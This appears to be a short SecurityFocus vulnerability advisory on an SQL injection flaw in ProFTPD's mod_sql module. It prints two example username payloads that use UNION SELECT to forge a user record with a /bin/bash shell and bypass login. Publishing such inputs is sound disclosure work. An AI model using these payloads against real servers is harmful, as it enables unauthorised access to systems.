ProFTPD 'mod_sql' Username SQL Injection Vulnerability

Attackers can use standard tools to exploit this issue.

The following example input is available:

username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1

username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a

The following exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus